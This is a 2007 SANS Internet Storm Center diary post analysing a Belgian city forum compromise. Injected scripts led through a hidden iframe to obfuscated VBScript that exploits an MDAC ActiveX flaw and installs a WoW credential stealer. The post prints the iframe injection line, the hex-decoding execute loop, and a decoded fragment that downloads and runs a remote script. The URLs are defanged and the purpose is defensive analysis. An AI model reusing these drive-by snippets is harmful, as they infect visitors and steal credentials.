Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Non-malicious compromise pointing to a benign VBScript! SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms:

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Non-malicious compromise pointing to a benign VBScript!

Note: please tread carefully here. While we've obfuscated all malicious links, some of them are still live on the internet. Over the weekend we have been working with anti-virus vendors as well as the regional CERT team to have the issue resolved, but we haven't been quite as succesful as we've hoped. This attack doesn't merely apply to the site mentioned, but spreads out over hundreds of compromised sites - so you may feel like filtering the malicious URL mentioned.

At least if you believe everything your neighborhood webmaster tells you... Early last week, the forum of the website of Leuven, a major student town in Belgium, got compromised. National press reported the compromise occurred through so-called SQL infection (sic), after which links to a .cn web server were added. In an interview, an IT representative of the local government stated that the "hack was not malicious. No data on the website was removed, altered or stolen".

Reason enough for the Internet Storm Center to have a second look. Apparently several pages on the forum were altered to contain a script tag to:
hxxp://www /ms/ltxs.js
This Javascript routes you to another page using a hidden iframe:
document.write("<ifra me width='0' height='0' src='hxxp ://www xvgaoke. cn/ms/ltxs.htm'></ifra me>");
The resulting page contains a piece of VBScript (reduced in size below for brevity), a hyperlink to Google and a counter hosted on a Chinese web server.
abc = "006F006E0020006500720072006F0072...65006E0022002C0030000D000A"
cde = "006F006E0020006500720072006F007...00065006E0022002C0030000D000A"
Function decode(x)
For i = 1 To Len(x) Step 4
If Mid(x, i, 4) = "0D0A" Then
decode = decode & vbCrLf
decode = decode & Chr(Int("&H" & Mid(x, i, 4)))
End If
End Function
execute (decode(abc))
execute (decode(cde))

 Naturally, we want to have a look at what this code does. It's easy to execute VBScripts on the desktop using the Windows Script Host, or WSH, and its tool wscript. The content can just be copied into a vbs file and executed. However, that's not what we want to do here, since the script says EXECUTE. Not a good idea.

 So, let's change these commands around a bit. Wscript contains a function that allows you to echo content to the screen in a message box:

wscript.echo (decode(abc))
wscript.echo (decode(cde))
Executing the script through wscript then results in some more VBScript which includes the following code:
on error resume next
MircoLong="hxxp:// www xvgaoke. cn/ms/ltxs.vbs"
set MircoLonge=MircoLongc.createobject(m5,"")
MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0
We can see a reference to BD96C556-65A3-11D0-983A-00C04FC29E36. This is the CLSID for a Microsoft Data Access component (MDAC). On April 12th, 2006, a Microsoft advisory reported on a significant vulnerability in an ActiveX control part of the ActiveX Data Objects (ADO), referenced in the exploit code above. Today still, this vulnerability is commonly exploited as part of so-called drive by exploits.
Without being noticed, the code then downloads ltts.exe from the same server and executes it on the victim system. On August 25th, the malware had a SHA1 hash of c1cbee89ba1033b8e739067eab086f70b476c5aa and was about 50 kb in size. Five days after the compromise took place, the binary was detected by 9 out of 32 anti-virus solutions. Note that it’s quite common for people running such malicious web server to change their malcode every so often as to reduce the risk of getting detected by anti-virus.
Once run on a system, the software drops a number of executables and installs one of them as a userinit value under the winlogon process. This makes for one of those pesty-difficult-to-remove pieces of spyware. In the end its final goal appears to be the gathering of World of Warcraft authentication credentials.
If you're still wondering why these are so prized, run this small google query. On-line games such as WoW have recently begun to implement the concept of Real Money Transactions - yes, real money you can lose by getting compromised and others can gain.

So this leaves me wondering why exactly this was a non-malicious compromise ?

Maarten Van Horenbeeck


158 Posts
Aug 28th 2007

Sign Up for Free or Log In to start participating in the conversation!